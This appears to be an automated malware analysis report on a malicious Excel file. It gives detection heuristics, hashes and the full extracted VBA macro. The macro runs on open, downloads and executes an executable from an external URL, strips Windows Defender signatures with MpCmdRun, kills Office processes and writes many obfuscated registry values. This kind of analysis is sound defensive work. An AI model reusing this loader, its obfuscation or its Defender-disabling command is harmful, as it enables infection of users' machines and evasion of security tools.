Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 358a60ba99153e24…

MALICIOUS

Office (OOXML)

20.9 KB Created: 2006-09-16 00:00:00 UTC Authoring application: Microsoft Excel 12.0000 First seen: 2021-02-23
MD5: 80e4e06cb7ca424b0915ca7c3c0c839e SHA-1: 3b49b30a85cb64ce871a6176b976d55fad68dab6 SHA-256: 358a60ba99153e244732fbdb8992865053a0c969a9892abdf96568147612a332
510 Risk Score

Heuristics 11

  • ClamAV: Doc.Dropper.Agent-6412232-1 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-6412232-1
  • VBA project inside OOXML medium 8 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • Potential Shell call in VBA critical OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script
    Shell (ETJBuhLeL(bFiJlSB8k("è‹CŸõÃ57514750517A7257404A4;417A5154414:4D51564G47550G475:47", "PYrSGYbFx")))
  • WScript.Shell usage critical OLE_VBA_WSCRIPT
    WScript.Shell usage
    Matched line in script
    Set tskkills = CreateObject("WScript.Shell")
  • VBA downloads and writes a file to disk critical OLE_VBA_HTTP_DROP_EXEC
    VBA reads an HTTP response body and writes it to disk (ADODB.Stream SaveToFile). Combined with the auto-exec/Shell paths this is a download-drop dropper even when the COM ProgIDs are built dynamically to evade keyword scanning.
    Matched line in script
    .write xHttp.responseBody
  • Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
    Matched line in script
    Dim xHttp: Set xHttp = CreateObject(ETJBuhLeL(bFiJlSB8k("`âf§vM704D514D44560G7:6F6A6:767672", "Ix8GibZ4z")))
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    Dim xHttp: Set xHttp = CreateObject(ETJBuhLeL(bFiJlSB8k("`âf§vM704D514D44560G7:6F6A6:767672", "Ix8GibZ4z")))
  • cmd.exe reference in VBA high OLE_VBA_CMD
    cmd.exe reference in VBA
    Matched line in script
    Start = "cmd.exe /c cd ""%ProgramFiles%\Windows Defender"" & MpCmdRun.exe -removedefinitions -dynamicsignatures & exit"
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
  • Workbook_Open macro low OLE_VBA_WBOPEN
    Workbook_Open macro
    Matched line in script
    Private Sub Workbook_Open()
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://stemtopx.com/work/5.exe Referenced by macro
    • http://stemtopx.com/work/5.exe�Referenced by macro

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 22033 bytes
SHA-256: 058b1c20a10f953a1d23bf1201adb32ab7c90fa1e5d92e5b76a534b50e2d3993
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "Module1"
Sub tfastgdyugsuf()

End Sub

Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Workbook_Open()
Dim xHttp: Set xHttp = CreateObject(ETJBuhLeL(bFiJlSB8k("`âf§vM704D514D44560G7:6F6A6:767672", "Ix8GibZ4z")))
Dim bStrm: Set bStrm = CreateObject(ETJBuhLeL(bFiJlSB8k("ÂÁÖô¶F46400G71565047434F", "AQOH6ke2r")))
xHttp.Open "GET", "http://stemtopx.com/work/5.exe", False
xHttp.Send
With bStrm
.Type = 1
.Open
.write xHttp.responseBody
.savetofile ETJBuhLeL(bFiJlSB8k("è‹CŸõÃ57514750517A7257404A4;417A5154414:4D51564G47550G475:47", "PYrSGYbFx")), 2 '
End With
Shell (ETJBuhLeL(bFiJlSB8k("è‹CŸõÃ57514750517A7257404A4;417A5154414:4D51564G47550G475:47", "PYrSGYbFx")))
Set defender = CreateObject(ETJBuhLeL(bFiJlSB8k("›W‹³61504;52560G714:474A4A", "R31evr5K9")))
Dim Start
Start = "cmd.exe /c cd ""%ProgramFiles%\Windows Defender"" & MpCmdRun.exe -removedefinitions -dynamicsignatures & exit"
defender.Run Start, vbHide
Set tskkills = CreateObject("WScript.Shell")
Dim STArTkwZkills
STArTkwZkills = "cmd /c taskkill /f /im winword.exe & taskkill /f /im excel.exe & taskkill /f /im MSPUB.exe & exit"
tskkills.Run STArTkwZkills, vbHide
Set wso = CreateObject(ETJBuhLeL(bFiJlSB8k("›W‹³61504;52560G714:474A4A", "R31evr5K9")))
wso.RegWrite ETJBuhLeL(bFiJlSB8k("l–Tü´3777A714D4456554350477A6F4;41504D514D44567A6D44444;41477A13130G127A754D50467A71474157504;565;7A7460637543504G4;4G4551", "xsxFElisg")), 1, ETJBuhLeL(bFiJlSB8k("­ j‹´77D66756D7066", "uHOQhhyqw"))
wso.RegWrite ETJBuhLeL(bFiJlSB8k("ÂÈÔ‚´3777A714D4456554350477A6F4;41504D514D44567A6D44444;41477A13100G127A754D50467A71474157504;565;7A7460637543504G4;4G4551", "LuXXJjiSt")), 1, ETJBuhLeL(bFiJlSB8k("­ j‹´77D66756D7066", "uHOQhhyqw"))
wso.RegWrite ETJBuhLeL(bFiJlSB8k("¦ zÜtM577A714D4456554350477A6F4;41504D514D44567A6D44444;41477A13160G127A754D50467A71474157504;565;7A7460637543504G4;4G4551", "C2j5sVMzx")), 1, ETJBuhLeL(bFiJlSB8k("­ j‹´77D66756D7066", "uHOQhhyqw"))
wso.RegWrite ETJBuhLeL(bFiJlSB8k("è€Dœô³577A714D4456554350477A6F4;41504D514D44567A6D44444;41477A13170G127A754D50467A71474157504;565;7A7460637543504G4;4G4551", "t8DFUoGej")), 1, ETJBuhLeL(bFiJlSB8k("­ j‹´77D66756D7066", "uHOQhhyqw"))
wso.RegWrite ETJBuhLeL(bFiJlSB8k("”xJB61777A714D4456554350477A6F4;41504D514D44567A6D44444;41477A13140G127A754D50467A71474157504;565;7A7460637543504G4;4G4551", "B05ls9Rxz")), 1, ETJBuhLeL(bFiJlSB8k("­ j‹´77D66756D7066", "uHOQhhyqw"))
wso.RegWrite ETJBuhLeL(bFiJlSB8k("è€Dœô³577A714D4456554350477A6F4;41504D514D44567A6D44444;41477A13130G127A724D554750724D4;4G567A71474157504;565;7A7460637543504G4;4G4551", "CN4Mk1AWY")), 1, ETJBuhLeL(bFiJlSB8k("­ j‹´77D66756D7066", "uHOQhhyqw"))
wso.RegWrite ETJBuhLeL(bFiJlSB8k("ZæôÂ41777A714D4456554350477A6F4;41504D514D44567A6D44444;41477A13100G127A724D554750724D4;4G567A71474157504;565;7A7460637543504G4;4G4551", "kFYqShidu")), 1, ETJBuhLeL(bFiJlSB8k("­ j‹´77D66756D7066", "uHOQhhyqw"))
wso.RegWrite ETJBuhLeL(bFiJlSB8k(" Vê‚´3777A714D4456554350477A6F4;41504D514D44567A6D44444;41477A13160G127A724D554750724D4;4G567A71474157504;565;7A7460637543504G4;4G4551", "L12Z61XJE")), 1, ETJBuhLeL(bFiJlSB8k("­ j‹´77D66756D7066", "uHOQhhyqw"))
wso.RegWrite ETJBuhLeL(bFiJlSB8k("ˆ@Ú¢ô³577A714D4456554350477A6F4;41504D514D44567A6D44444;41477A13170G127A724D554750724D4;4G567A71474157504;565;7A7460637543504G4;4G4551", "kNI0IRIKx")), 1, ETJBuhLeL(bFiJlSB8k("­ j‹´77D66756D7066", "uHOQhhyqw"))
wso.RegWrite ETJBuhLeL(bFiJlSB8k("( Zœô³577A714D4456554350477A6F4;41504D514D44567A6D44444;41477A13140G127A724D554750724D4;4G567A71474157504;565;7A7460637543504G4;4G4551", "V4H4yZWyG")), 1, ETJBuhLeL(bFiJlSB8k("­ j‹´77D66756D7066", "uHOQhhyqw"))
wso.RegWrite ETJBuhLeL(bFiJlSB8k("šXŠÂ41777A714D4456554350477A6F4;41504D514D44567A6D44444;41477A13130G127A5257404A4;514:47507A71474157504;565;7A7460637543504G4;4G4551", "LVnSXqC7x")), 1, ETJBuhLeL(bFiJlSB8k("­ j‹´77D66756D7066", "uHOQhhyqw"))
wso.RegWrite ETJBuhLeL(bFiJlSB8k(" Vê‚´3777A714D4456554350477A6F4;41504D514D44567A6D44444;41477A13100G127A5257404A4;514:47507A71474157504;565;7A7460637543504G4;4G4551", "WROmgMHYL")), 1, ETJBuhLeL(bFiJlSB8k("­ j‹´77D66756D7066", "uHOQhhyqw"))
wso.RegWrite ETJBuhLeL(bFiJlSB8k(" Vê‚´3777A714D4456554350477A6F4;41504D514D44567A6D44444;41477A13160G127A5257404A4;514:47507A71474157504;565;7A7460637543504G4;4G4551", "VLYzx1kj7")), 1, ETJBuhLeL(bFiJlSB8k("­ j‹´77D66756D7066", "uHOQhhyqw"))
wso.RegWrite ETJBuhLeL(bFiJlSB8k("œhª J3777A714D4456554350477A6F4;41504D514D44567A6D44444;41477A13170G127A5257404A4;514:47507A71474157504;565;7A7460637543504G4;4G4551", "dkcg2YPVB")), 1, ETJBuhLeL(bFiJlSB8k("­ j‹´77D66756D7066", "uHOQhhyqw"))
wso.RegWrite ETJBuhLeL(bFiJlSB8k(" ^úâtM577A714D4456554350477A6F4;41504D514D44567A6D44444;41477A13140G127A5257404A4;514:47507A71474157504;565;7A7460637543504G4;4G4551", "jxAaFaFqL")), 1, ETJBuhLeL(bFiJlSB8k("­ j‹´77D66756D7066", "uHOQhhyqw"))
wso.RegWrite ETJBuhLeL(bFiJlSB8k("î€Dœô³577A714D4456554350477A6F4;41504D514D44567A6D44444;41477A13130G127A675:41474A7A71474157504;565;7A7460637543504G4;4G4551", "PfaW5IkV1")), 1, ETJBuhLeL(bFiJlSB8k("­ j‹´77D66756D7066", "uHOQhhyqw"))
wso.RegWrite ETJBuhLeL(bFiJlSB8k(" fŠÂ41777A714D4456554350477A6F4;41504D514D44567A6D44444;41477A13100G127A675:41474A7A71474157504;565;7A7460637543504G4;4G4551", "UZ1gsg7mb")), 1, ETJBuhLeL(bFiJlSB8k("­ j‹´77D66756D7066", "uHOQhhyqw"))
wso.RegWrite ETJBuhLeL(bFiJlSB8k(" fŠÂ41777A714D4456554350477A6F4;41504D514D44567A6D44444;41477A13160G127A675:41474A7A71474157504;565;7A7460637543504G4;4G4551", "yiORlLOTp")), 1, ETJBuhLeL(bFiJlSB8k("­ j‹´77D66756D7066", "uHOQhhyqw"))
wso.RegWrite ETJBuhLeL(bFiJlSB8k(". Zœô³577A714D4456554350477A6F4;41504D514D44567A6D44444;41477A13170G127A675:41474A7A71474157504;565;7A7460637543504G4;4G4551", "h5GFnr3qC")), 1, ETJBuhLeL(bFiJlSB8k("­ j‹´77D66756D7066", "uHOQhhyqw"))
wso.RegWrite ETJBuhLeL(bFiJlSB8k("”xJB61777A714D4456554350477A6F4;41504D514D44567A6D44444;41477A13140G127A675:41474A7A71474157504;565;7A7460637543504G4;4G4551", "hxm6t08wi")), 1, ETJBuhLeL(bFiJlSB8k("­ j‹´77D66756D7066", "uHOQhhyqw"))
wso.RegWrite ETJBuhLeL(bFiJlSB8k("”xJB61777A714D4456554350477A6F4;41504D514D44567A6D44444;41477A13130G127A754D50467A71474157504;565;7A72504D564741564746744;47557A664;5143404A476;4G5647504G4756644;4A47516;4G7274", "pei5HeYp2")), 1, ETJBuhLeL(bFiJlSB8k("­ j‹´77D66756D7066", "uHOQhhyqw"))
wso.RegWrite ETJBuhLeL(bFiJlSB8k("<6*|J3777A714D4456554350477A6F4;41504D514D44567A6D44444;41477A13130G127A754D50467A71474157504;565;7A72504D564741564746744;47557A664;5143404A4763565643414:474F474G56516;4G7274", "uTfV4KmOY")), 1, ETJBuhLeL(bFiJlSB8k("­ j‹´77D66756D7066", "uHOQhhyqw"))
wso.RegWrite ETJBuhLeL(bFiJlSB8k("l–Tü´3777A714D4456554350477A6F4;41504D514D44567A6D44444;41477A13130G127A754D50467A71474157504;565;7A72504D564741564746744;47557A664;5143404A47774G514344476A4D4143564;4D4G516;4G7274", "vjjOLIXzy")), 1, ETJBuhLeL(bFiJlSB8k("­ j‹´77D66756D7066", "uHOQhhyqw"))
wso.RegWrite ETJBuhLeL(bFiJlSB8k("tF4@61777A714D4456554350477A6F4;41504D514D44567A6D44444;41477A13130G127A724D554750724D4;4G567A71474157504;565;7A72504D564741564746744;47557A664;5143404A476;4G5647504G4756644;4A47516;4G7274", "gLThyo2Yf")), 1, ETJBuhLeL(bFiJlSB8k("­ j‹´77D66756D7066", "uHOQhhyqw"))
wso.RegWrite ETJBuhLeL(bFiJlSB8k(" vª J3777A714D4456554350477A6F4;41504D514D44567A6D44444;41477A13130G127A724D554750724D4;4G567A71474157504;565;7A72504D564741564746744;47557A664;5143404A4763565643414:474F474G56516;4G7274", "nB2wQ7fTY")), 1, ETJBuhLeL(bFiJlSB8k("­ j‹´77D66756D7066", "uHOQhhyqw"))
wso.RegWrite ETJBuhLeL(bFiJlSB8k("DæôÂ41777A714D4456554350477A6F4;41504D514D44567A6D44444;41477A13130G127A724D554750724D4;4G567A71474157504;565;7A72504D564741564746744;47557A664;5143404A47774G514344476A4D4143564;4D4G516;4G7274", "kNSwWKz2I")), 1, ETJBuhLeL(bFiJlSB8k("­ j‹´77D66756D7066", "uHOQhhyqw"))
wso.RegWrite ETJBuhLeL(bFiJlSB8k("ä˜t<41777A714D4456554350477A6F4;41504D514D44567A6D44444;41477A13130G127A675:41474A7A71474157504;565;7A72504D564741564746744;47557A664;5143404A476;4G5647504G4756644;4A47516;4G7274", "f3XN5vmIk")), 1, ETJBuhLeL(bFiJlSB8k("­ j‹´77D66756D7066", "uHOQhhyqw"))
wso.RegWrite ETJBuhLeL(bFiJlSB8k("ZæôÂ41777A714D4456554350477A6F4;41504D514D44567A6D44444;41477A13130G127A675:41474A7A71474157504;565;7A72504D564741564746744;47557A664;5143404A4763565643414:474F474G56516;4G7274", "ceafMwdwW")), 1, ETJBuhLeL(bFiJlSB8k("­ j‹´77D66756D7066", "uHOQhhyqw"))
wso.RegWrite ETJBuhLeL(bFiJlSB8k("ü¨ |J3777A714D4456554350477A6F4;41504D514D44567A6D44444;41477A13130G127A675:41474A7A71474157504;565;7A72504D564741564746744;47557A664;5143404A47774G514344476A4D4143564;4D4G516;4G7274", "x113Ods39")), 1, ETJBuhLeL(bFiJlSB8k("­ j‹´77D66756D7066", "uHOQhhyqw"))
wso.RegWrite ETJBuhLeL(bFiJlSB8k("’hª J3777A714D4456554350477A6F4;41504D514D44567A6D44444;41477A13100G127A754D50467A71474157504;565;7A72504D564741564746744;47557A664;5143404A476;4G5647504G4756644;4A47516;4G7274", "kxjT7tuCj")), 1, ETJBuhLeL(bFiJlSB8k("­ j‹´77D66756D7066", "uHOQhhyqw"))
wso.RegWrite ETJBuhLeL(bFiJlSB8k("Rö” J3777A714D4456554350477A6F4;41504D514D44567A6D44444;41477A13100G127A754D50467A71474157504;565;7A72504D564741564746744;47557A664;5143404A4763565643414:474F474G56516;4G7274", "ApDp8q9nV")), 1, ETJBuhLeL(bFiJlSB8k("­ j‹´77D66756D7066", "uHOQhhyqw"))
wso.RegWrite ETJBuhLeL(bFiJlSB8k(" NÚ¢ô³577A714D4456554350477A6F4;41504D514D44567A6D44444;41477A13100G127A754D50467A71474157504;565;7A72504D564741564746744;47557A664;5143404A47774G514344476A4D4143564;4D4G516;4G7274", "tEKzNeYme")), 1, ETJBuhLeL(bFiJlSB8k("­ j‹´77D66756D7066", "uHOQhhyqw"))
wso.RegWrite ETJBuhLeL(bFiJlSB8k("æ�dÜtM577A714D4456554350477A6F4;41504D514D44567A6D44444;41477A13100G127A724D554750724D4;4G567A71474157504;565;7A72504D564741564746744;47557A664;5143404A476;4G5647504G4756644;4A47516;4G7274", "EeYaIlCxX")), 1, ETJBuhLeL(bFiJlSB8k("­ j‹´77D66756D7066", "uHOQhhyqw"))
wso.RegWrite ETJBuhLeL(bFiJlSB8k("ŒHê‚´3777A714D4456554350477A6F4;41504D514D44567A6D44444;41477A13100G127A724D554750724D4;4G567A71474157504;565;7A72504D564741564746744;47557A664;5143404A4763565643414:474F474G56516;4G7274", "ctbXRAqBZ")), 1, ETJBuhLeL(bFiJlSB8k("­ j‹´77D66756D7066", "uHOQhhyqw"))
wso.RegWrite ETJBuhLeL(bFiJlSB8k("ÈÀÄ¢ô³577A714D4456554350477A6F4;41504D514D44567A6D44444;41477A13100G127A724D554750724D4;4G567A71474157504;565;7A72504D564741564746744;47557A664;5143404A47774G514344476A4D4143564;4D4G516;4G7274", "GK7UhDbQk")), 1, ETJBuhLeL(bFiJlSB8k("­ j‹´77D66756D7066", "uHOQhhyqw"))
wso.RegWrite ETJBuhLeL(bFiJlSB8k("’hª J3777A714D4456554350477A6F4;41504D514D44567A6D44444;41477A13100G127A675:41474A7A71474157504;565;7A72504D564741564746744;47557A664;5143404A476;4G5647504G4756644;4A47516;4G7274", "UfqUNNJg8")), 1, ETJBuhLeL(bFiJlSB8k("­ j‹´77D66756D7066", "uHOQhhyqw"))
wso.RegWrite ETJBuhLeL(bFiJlSB8k("\ö” J3777A714D4456554350477A6F4;41504D514D44567A6D44444;41477A13100G127A675:41474A7A71474157504;565;7A72504D564741564746744;47557A664;5143404A4763565643414:474F474G56516;4G7274", "Dh0Esbczo")), 1, ETJBuhLeL(bFiJlSB8k("­ j‹´77D66756D7066", "uHOQhhyqw"))
wso.RegWrite ETJBuhLeL(bFiJlSB8k("tF4@61777A714D4456554350477A6F4;41504D514D44567A6D44444;41477A13100G127A675:41474A7A71474157504;565;7A72504D564741564746744;47557A664;5143404A47774G514344476A4D4143564;4D4G516;4G7274", "uheuC0eh3")), 1, ETJBuhLeL(bFiJlSB8k("­ j‹´77D66756D7066", "uHOQhhyqw"))
wso.RegWrite ETJBuhLeL(bFiJlSB8k("¼(*|J3777A714D4456554350477A6F4;41504D514D44567A6D44444;41477A13160G127A754D50467A71474157504;565;7A72504D564741564746744;47557A664;5143404A476;4G5647504G4756644;4A47516;4G7274", "YBsSh4XVU")), 1, ETJBuhLeL(bFiJlSB8k("­ j‹´77D66756D7066", "uHOQhhyqw"))
wso.RegWrite ETJBuhLeL(bFiJlSB8k("HÎÄ¢ô³577A714D4456554350477A6F4;41504D514D44567A6D44444;41477A13160G127A754D50467A71474157504;565;7A72504D564741564746744;47557A664;5143404A4763565643414:474F474G56516;4G7274", "TGtgRRqgD")), 1, ETJBuhLeL(bFiJlSB8k("­ j‹´77D66756D7066", "uHOQhhyqw"))
wso.RegWrite ETJBuhLeL(bFiJlSB8k("nŽDœô³577A714D4456554350477A6F4;41504D514D44567A6D44444;41477A13160G127A754D50467A71474157504;565;7A72504D564741564746744;47557A664;5143404A47774G514344476A4D4143564;4D4G516;4G7274", "TbMgo2YGr")), 1, ETJBuhLeL(bFiJlSB8k("­ j‹´77D66756D7066", "uHOQhhyqw"))
wso.RegWrite ETJBuhLeL(bFiJlSB8k("Òè” J3777A714D4456554350477A6F4;41504D514D44567A6D44444;41477A13160G127A724D554750724D4;4G567A71474157504;565;7A72504D564741564746744;47557A664;5143404A476;4G5647504G4756644;4A47516;4G7274", "DDHQkiy1K")), 1, ETJBuhLeL(bFiJlSB8k("­ j‹´77D66756D7066", "uHOQhhyqw"))
wso.RegWrite ETJBuhLeL(bFiJlSB8k("( Zœô³577A714D4456554350477A6F4;41504D514D44567A6D44444;41477A13160G127A724D554750724D4;4G567A71474157504;565;7A72504D564741564746744;47557A664;5143404A4763565643414:474F474G56516;4G7274", "VPKYhBoq5")), 1, ETJBuhLeL(bFiJlSB8k("­ j‹´77D66756D7066", "uHOQhhyqw"))
wso.RegWrite ETJBuhLeL(bFiJlSB8k("@ÞäâtM577A714D4456554350477A6F4;41504D514D44567A6D44444;41477A13160G127A724D554750724D4;4G567A71474157504;565;7A72504D564741564746744;47557A664;5143404A47774G514344476A4D4143564;4D4G516;4G7274", "YZsvodgLN")), 1, ETJBuhLeL(bFiJlSB8k("­ j‹´77D66756D7066", "uHOQhhyqw"))
wso.RegWrite ETJBuhLeL(bFiJlSB8k("|¶ |J3777A714D4456554350477A6F4;41504D514D44567A6D44444;41477A13160G127A675:41474A7A71474157504;565;7A72504D564741564746744;47557A664;5143404A476;4G5647504G4756644;4A47516;4G7274", "vpKxVRoMY")), 1, ETJBuhLeL(bFiJlSB8k("­ j‹´77D66756D7066", "uHOQhhyqw"))
wso.RegWrite ETJBuhLeL(bFiJlSB8k("´86@61777A714D4456554350477A6F4;41504D514D44567A6D44444;41477A13160G127A675:41474A7A71474157504;565;7A72504D564741564746744;47557A664;5143404A4763565643414:474F474G56516;4G7274", "a7CxcWILc")), 1, ETJBuhLeL(bFiJlSB8k("­ j‹´77D66756D7066", "uHOQhhyqw"))
wso.RegWrite ETJBuhLeL(bFiJlSB8k("FÞäâtM577A714D4456554350477A6F4;41504D514D44567A6D44444;41477A13160G127A675:41474A7A71474157504;565;7A72504D564741564746744;47557A664;5143404A47774G514344476A4D4143564;4D4G516;4G7274", "CwIA6PQop")), 1, ETJBuhLeL(bFiJlSB8k("­ j‹´77D66756D7066", "uHOQhhyqw"))
wso.RegWrite ETJBuhLeL(bFiJlSB8k("d¦t<41777A714D4456554350477A6F4;41504D514D44567A6D44444;41477A13170G127A754D50467A71474157504;565;7A72504D564741564746744;47557A664;5143404A476;4G5647504G4756644;4A47516;4G7274", "S3KRrCbqi")), 1, ETJBuhLeL(bFiJlSB8k("­ j‹´77D66756D7066", "uHOQhhyqw"))
wso.RegWrite ETJBuhLeL(bFiJlSB8k("& zÜtM577A714D4456554350477A6F4;41504D514D44567A6D44444;41477A13170G127A754D50467A71474157504;565;7A72504D564741564746744;47557A664;5143404A4763565643414:474F474G56516;4G7274", "sRJikuUPH")), 1, ETJBuhLeL(bFiJlSB8k("­ j‹´77D66756D7066", "uHOQhhyqw"))
wso.RegWrite ETJBuhLeL(bFiJlSB8k("4:6@61777A714D4456554350477A6F4;41504D514D44567A6D44444;41477A13170G127A754D50467A71474157504;565;7A72504D564741564746744;47557A664;5143404A47774G514344476A4D4143564;4D4G516;4G7274", "VUywFZT0P")), 1, ETJBuhLeL(bFiJlSB8k("­ j‹´77D66756D7066", "uHOQhhyqw"))
wso.RegWrite ETJBuhLeL(bFiJlSB8k("ÚØôÂ41777A714D4456554350477A6F4;41504D514D44567A6D44444;41477A13170G127A724D554750724D4;4G567A71474157504;565;7A72504D564741564746744;47557A664;5143404A476;4G5647504G4756644;4A47516;4G7274", "ygJAUeAVp")), 1, ETJBuhLeL(bFiJlSB8k("­ j‹´77D66756D7066", "uHOQhhyqw"))
wso.RegWrite ETJBuhLeL(bFiJlSB8k("HÎÄ¢ô³577A714D4456554350477A6F4;41504D514D44567A6D44444;41477A13170G127A724D554750724D4;4G567A71474157504;565;7A72504D564741564746744;47557A664;5143404A4763565643414:474F474G56516;4G7274", "EV0cXCXra")), 1, ETJBuhLeL(bFiJlSB8k("­ j‹´77D66756D7066", "uHOQhhyqw"))
wso.RegWrite ETJBuhLeL(bFiJlSB8k("x®  г577A714D4456554350477A6F4;41504D514D44567A6D44444;41477A13170G127A724D554750724D4;4G567A71474157504;565;7A72504D564741564746744;47557A664;5143404A47774G514344476A4D4143564;4D4G516;4G7274", "zDZbxzi7n")), 1, ETJBuhLeL(bFiJlSB8k("­ j‹´77D66756D7066", "uHOQhhyqw"))
wso.RegWrite ETJBuhLeL(bFiJlSB8k("ÈÀÄ¢ô³577A714D4456554350477A6F4;41504D514D44567A6D44444;41477A13170G127A675:41474A7A71474157504;565;7A72504D564741564746744;47557A664;5143404A476;4G5647504G4756644;4A47516;4G7274", "VRM1qi6pt")), 1, ETJBuhLeL(bFiJlSB8k("­ j‹´77D66756D7066", "uHOQhhyqw"))
wso.RegWrite ETJBuhLeL(bFiJlSB8k(" vª J3777A714D4456554350477A6F4;41504D514D44567A6D44444;41477A13170G127A675:41474A7A71474157504;565;7A72504D564741564746744;47557A664;5143404A4763565643414:474F474G56516;4G7274", "SxOkr5sOY")), 1, ETJBuhLeL(bFiJlSB8k("­ j‹´77D66756D7066", "uHOQhhyqw"))
wso.RegWrite ETJBuhLeL(bFiJlSB8k("ÆÐäâtM577A714D4456554350477A6F4;41504D514D44567A6D44444;41477A13170G127A675:41474A7A71474157504;565;7A72504D564741564746744;47557A664;5143404A47774G514344476A4D4143564;4D4G516;4G7274", "caznoKmHA")), 1, ETJBuhLeL(bFiJlSB8k("­ j‹´77D66756D7066", "uHOQhhyqw"))
wso.RegWrite ETJBuhLeL(bFiJlSB8k("DæôÂ41777A714D4456554350477A6F4;41504D514D44567A6D44444;41477A13140G127A754D50467A71474157504;565;7A72504D564741564746744;47557A664;5143404A476;4G5647504G4756644;4A47516;4G7274", "tJv3adPVi")), 1, ETJBuhLeL(bFiJlSB8k("­ j‹´77D66756D7066", "uHOQhhyqw"))
wso.RegWrite ETJBuhLeL(bFiJlSB8k("ZæôÂ41777A714D4456554350477A6F4;41504D514D44567A6D44444;41477A13140G127A754D50467A71474157504;565;7A72504D564741564746744;47557A664;5143404A4763565643414:474F474G56516;4G7274", "NT9PkrKxY")), 1, ETJBuhLeL(bFiJlSB8k("­ j‹´77D66756D7066", "uHOQhhyqw"))
wso.RegWrite ETJBuhLeL(bFiJlSB8k("DæôÂ41777A714D4456554350477A6F4;41504D514D44567A6D44444;41477A13140G127A754D50467A71474157504;565;7A72504D564741564746744;47557A664;5143404A47774G514344476A4D4143564;4D4G516;4G7274", "gXnZVtJu3")), 1, ETJBuhLeL(bFiJlSB8k("­ j‹´77D66756D7066", "uHOQhhyqw"))
wso.RegWrite ETJBuhLeL(bFiJlSB8k("  zÜtM577A714D4456554350477A6F4;41504D514D44567A6D44444;41477A13140G127A724D554750724D4;4G567A71474157504;565;7A72504D564741564746744;47557A664;5143404A476;4G5647504G4756644;4A47516;4G7274", "qyoCDB81S")), 1, ETJBuhLeL(bFiJlSB8k("­ j‹´77D66756D7066", "uHOQhhyqw"))
wso.RegWrite ETJBuhLeL(bFiJlSB8k("Џ4@61777A714D4456554350477A6F4;41504D514D44567A6D44444;41477A13140G127A724D554750724D4;4G567A71474157504;565;7A72504D564741564746744;47557A664;5143404A4763565643414:474F474G56516;4G7274", "hv0q3qI6R")), 1, ETJBuhLeL(bFiJlSB8k("­ j‹´77D66756D7066", "uHOQhhyqw"))
wso.RegWrite ETJBuhLeL(bFiJlSB8k(". Zœô³577A714D4456554350477A6F4;41504D514D44567A6D44444;41477A13140G127A724D554750724D4;4G567A71474157504;565;7A72504D564741564746744;47557A664;5143404A47774G514344476A4D4143564;4D4G516;4G7274", "FEgdbiCDL")), 1, ETJBuhLeL(bFiJlSB8k("­ j‹´77D66756D7066", "uHOQhhyqw"))
wso.RegWrite ETJBuhLeL(bFiJlSB8k("NÎÄ¢ô³577A714D4456554350477A6F4;41504D514D44567A6D44444;41477A13140G127A675:41474A7A71474157504;565;7A72504D564741564746744;47557A664;5143404A476;4G5647504G4756644;4A47516;4G7274", "Q2g4mLqFr")), 1, ETJBuhLeL(bFiJlSB8k("­ j‹´77D66756D7066", "uHOQhhyqw"))
wso.RegWrite ETJBuhLeL(bFiJlSB8k("€PúâtM577A714D4456554350477A6F4;41504D514D44567A6D44444;41477A13140G127A675:41474A7A71474157504;565;7A72504D564741564746744;47557A664;5143404A4763565643414:474F474G56516;4G7274", "rp3G0CAU7")), 1, ETJBuhLeL(bFiJlSB8k("­ j‹´77D66756D7066", "uHOQhhyqw"))
wso.RegWrite ETJBuhLeL(bFiJlSB8k("šXŠÂ41777A714D4456554350477A6F4;41504D514D44567A6D44444;41477A13140G127A675:41474A7A71474157504;565;7A72504D564741564746744;47557A664;5143404A47774G514344476A4D4143564;4D4G516;4G7274", "kIPorLm22")), 1, ETJBuhLeL(bFiJlSB8k("­ j‹´77D66756D7066", "uHOQhhyqw"))
End Sub
Public Function ETJBuhLeL(ByVal HqtxDJMeY As String)
Dim IFctgq1Z1 As Long, MYPFllgV2 As String, nn4twvlYf As String
    On Local Error Resume Next
    For IFctgq1Z1 = 1 To Len(HqtxDJMeY) Step 2
        MYPFllgV2 = MYPFllgV2 & Chr$(Val(bFiJlSB8k("ž8", "SpuMxLdt5") & Mid$(HqtxDJMeY, IFctgq1Z1, 2)))
    Next IFctgq1Z1
    ETJBuhLeL = MYPFllgV2
End Function
Public Function bFiJlSB8k(ByVal CrMcSviMY As String, ByVal CglbOe0H1 As String) As String
On Error Resume Next
Dim k7Sc8zGx2(0 To 255) As Integer, IFctgq1Z1 As Integer, third As Long, fourth() As Byte
fourth() = StrConv(CglbOe0H1, vbFromUnicode)
For IFctgq1Z1 = 0 To 255
    third = (third + k7Sc8zGx2(IFctgq1Z1) + fourth(IFctgq1Z1 Mod Len(CglbOe0H1))) Mod 256
    k7Sc8zGx2(IFctgq1Z1) = IFctgq1Z1
Next IFctgq1Z1
